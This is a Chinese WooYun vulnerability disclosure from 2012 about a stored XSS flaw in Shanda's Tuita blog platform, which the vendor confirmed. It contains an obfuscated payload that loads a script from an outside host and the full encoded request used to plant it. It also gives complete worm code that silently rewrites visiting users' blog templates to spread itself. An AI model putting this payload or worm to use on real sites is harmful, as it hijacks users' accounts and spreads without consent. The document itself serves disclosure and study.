当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010477

漏洞标题:盛大 - 推她 - 存储型XSS

相关厂商:盛大网络

漏洞作者: gainover

提交时间:2012-08-02 09:06

修复时间:2012-09-16 09:06

公开时间:2012-09-16 09:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-02: 细节已通知厂商并且等待厂商处理中
2012-08-02: 厂商已经确认,细节仅向厂商公开
2012-08-12: 细节向核心白帽子及相关领域专家公开
2012-08-22: 细节向普通白帽子公开
2012-09-01: 细节向实习白帽子公开
2012-09-16: 细节向公众公开

简要描述:

盛大tuita某处功能导致www.tuita.com域名下的存储型XSS,结合轻博客支持模板自定义的功能,可导致蠕虫。 因为我是公的,所以是“推她”~~

详细说明:

Tuita开放了用户页面模板自定义功能,主要操作则限制于www.tuita.com主域名下,因而要寻找该域名下的XSS。
因为在特定标签下,可以展现我们所发布的内容。例如:
我们随便发表一个内容,标签贴上:wooyuntest
那么在,http://www.tuita.com/tagpage/wooyuntest 就可以看到我们发送的内容!
---------------------------------------
如果发布内容存在XSS的话,那么
http://www.tuita.com/tagpage/wooyuntest
页面将会出现XSS,从而被我们利用。
---------------------------------------
抱着这个目的,我们对发布内容进行XSS测试:
1. 首先发布一个正常内容:


2. 抓包,查看发送了什么数据:
地址:http://www.tuita.com/post/create
类型:POST
数据:见图片!


3. 可以看到content是JSON数据格式,当我们向song_id这个属性加入\u0022\u003E进行构造测试时,会发现。。。


4. 结果么,哦和~~ 侧漏了。


知道怎么侧漏~,接着就简单了!
5. 构造闭合代码:

"></object><img/src="http://www.baidu.com/img/baidu_sylogo1.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,105,116,115,111,107,108,97,46,100,117,97,112,112,46,99,111,109,47,106,46,106,115);document.body.appendChild(window.s)"><object><i a="


6. 编码一下,并放入发送数据中。

{"PlayerFlashVar":"http:\/\/www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description":"<P>ok! look!<\/P>"}}


7. 上面的利用代码,会使得 http://www.tuita.com/tagpage/wooyuntest 变成一个带有存储型XSS的页面,当受害者打开这个页面时,就会执行我们外部JS文件的内容。


8. 那么进一步对该漏洞的利用主要有2种方式!
利用方式1:批量向【热门标签】推送带有XSS的内容!
利用方式2:在自己的个人主页模板代码内,使用iframe嵌入 http://www.tuita.com/tagpage/wooyuntest 页面。 从而受害者在查看他人个人主页时,可以被感染恶意代码!
9. 这里对第2种利用方式进行说明:
在本人自己tuita的模板设置里,--》自定义HTML--》在 </body>之前加入一个iframe

<iframe src="http://www.tuita.com/tagpage/test" style="display:none" id="wooyun"></iframe>


然后将 http://1881056377.tuita.com/ 发送给受害者访问。
受害者打开页面后,会执行http://www.tuita.com/tagpage/test中的恶意代码内容, 从而在自己的模板里也被插入一段恶意代码:<iframe src="http://www.tuita.com/tagpage/test" style="display:none" id="wooyun"></iframe>
10. 恶意代码如下:
代码中调用的pkav库,见 http://itsokla.duapp.com/pkav.js

if(pkav.is_domain("www.tuita.com")){
//tuita xss worm
function createPost(id){
pkav.post("http://www.tuita.com/post/create","post_title=%E5%9B%AD%E6%B8%B8%E4%BC%9A&post_content=%7B%22PlayerFlashVar%22%3A%22http%3A%5C%2F%5C%2Fwww.xiami.com%5C%2Fwidget%5C%2F0_376013%5C%2FsinglePlayer.swf%22%2C%22song_id%22%3A%22376013%5Cu0022%5Cu003e%5Cu003c%5Cu002f%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0077%5Cu0077%5Cu0077%5Cu002e%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu005f%5Cu0073%5Cu0079%5Cu006c%5Cu006f%5Cu0067%5Cu006f%5Cu0031%5Cu002e%5Cu0067%5Cu0069%5Cu0066%5Cu0022%5Cu006f%5Cu006e%5Cu006c%5Cu006f%5Cu0061%5Cu0064%5Cu003d%5Cu0022%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu003d%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0063%5Cu0072%5Cu0065%5Cu0061%5Cu0074%5Cu0065%5Cu0045%5Cu006c%5Cu0065%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu0028%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0034%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu0029%5Cu0029%5Cu003b%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu002e%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0030%5Cu0034%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0035%5Cu0038%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0038%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0030%5Cu002c%5Cu0031%5Cu0031%5Cu0037%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0039%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu0029%5Cu003b%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0062%5Cu006f%5Cu0064%5Cu0079%5Cu002e%5Cu0061%5Cu0070%5Cu0070%5Cu0065%5Cu006e%5Cu0064%5Cu0043%5Cu0068%5Cu0069%5Cu006c%5Cu0064%5Cu0028%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu0029%5Cu0022%5Cu003e%5Cu003c%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu0020%5Cu0061%5Cu003d%5Cu0022%22%2C%22song_name%22%3A%22%5Cu56ed%5Cu6e38%5Cu4f1a%22%2C%22artist_id%22%3A%22%5Cu5468%5Cu6770%5Cu4f26%22%2C%22album_name%22%3A%22%5Cu4e03%5Cu91cc%5Cu9999%22%2C%22album_logo%22%3A%7B%2255%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_3.jpg%22%2C%22100%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_1.jpg%22%2C%22185%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_2.jpg%22%2C%22300%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_4.jpg%22%7D%2C%22audio_info%22%3A%7B%22album_logo%22%3Anull%2C%22description%22%3A%22%3CP%3Eok%21+look%21%3C%5C%2FP%3E%22%7D%7D&post_type=xiami&blog_id="+id+"&sync_flag=0&syn=&post_tag=test&sticky=0&draft_id=451375&from=home&dtime=null",function(rs){
});
}
//获得用户的设置
function getSetting(id){
pkav.get("http://www.tuita.com/template/get?blog_id="+id+"&tsdump="+new Date().getTime(),function (rs){
var obj=eval("("+rs+")");
if(obj.data&&obj.data.tpl_html&&obj.data.tpl_html.indexOf("wooyun")==-1){
//说明还没有被感染~~
obj.data.tpl_html=obj.data.tpl_html.replace(/<\/body>/,"<iframe src=\"http://www.tuita.com/tagpage/test\" style=\"display:none\" id=\"wooyun\"></iframe></body>");
saveSetting(id,obj);
}else{
try{
console.log("done!");
}catch(e){}
}
});
}
function saveSetting(id,obj){
pkav.post("http://www.tuita.com/template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function (rs){
try{
console.log("ok!");
}catch(e){}
});
}
function getID(){
pkav.get("http://www.tuita.com/home?hash="+Math.random(),function(rs){
var id=pkav.fetch(rs,/http:\/\/www\.tuita\.com\/blogsetting\/(\d+)/);
getSetting(id);
//createPost(id);
});
}
if(!window.___x){
getID();
window.___x=1;
}
}


11. 漏洞效果见证明!

漏洞证明:

当受害者以登录态, 访问http://1881056377.tuita.com/之后,自己的博客也会被感染!
访问以上地址的受害者,博客页面也插入了恶意代码,见下图:

修复方案:

对post_content里song_id以及其它参数(未测试,但可能存在相同问题)的内容加以过滤。

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-08-02 09:14

厂商回复:

感谢gainover提交漏洞信息。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-08-02 09:10 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    推她!

  2. 2012-08-02 09:21 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    直接推倒了~~

  3. 2012-08-02 09:22 | YunDay ( 路人 | Rank:30 漏洞数:4 | http://www.yunday.org)

    Do她!

  4. 2012-08-02 13:34 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @xsser @xsser 推她!

  5. 2012-09-01 12:22 | cnsars ( 路人 | Rank:10 漏洞数:4 | 学习中)

    洞主是公的。。。

  6. 2012-09-01 13:55 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    真牛逼,首席跨站师,就是你了!!!

  7. 2012-09-03 10:47 | 网络小新 ( 路人 | Rank:0 漏洞数:2 | 职业菜鸟,长期沉浸在信息安全的海洋中··...)

    不愧是肾斗士啊!!!

  8. 2012-09-16 09:41 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    G神 侧露了。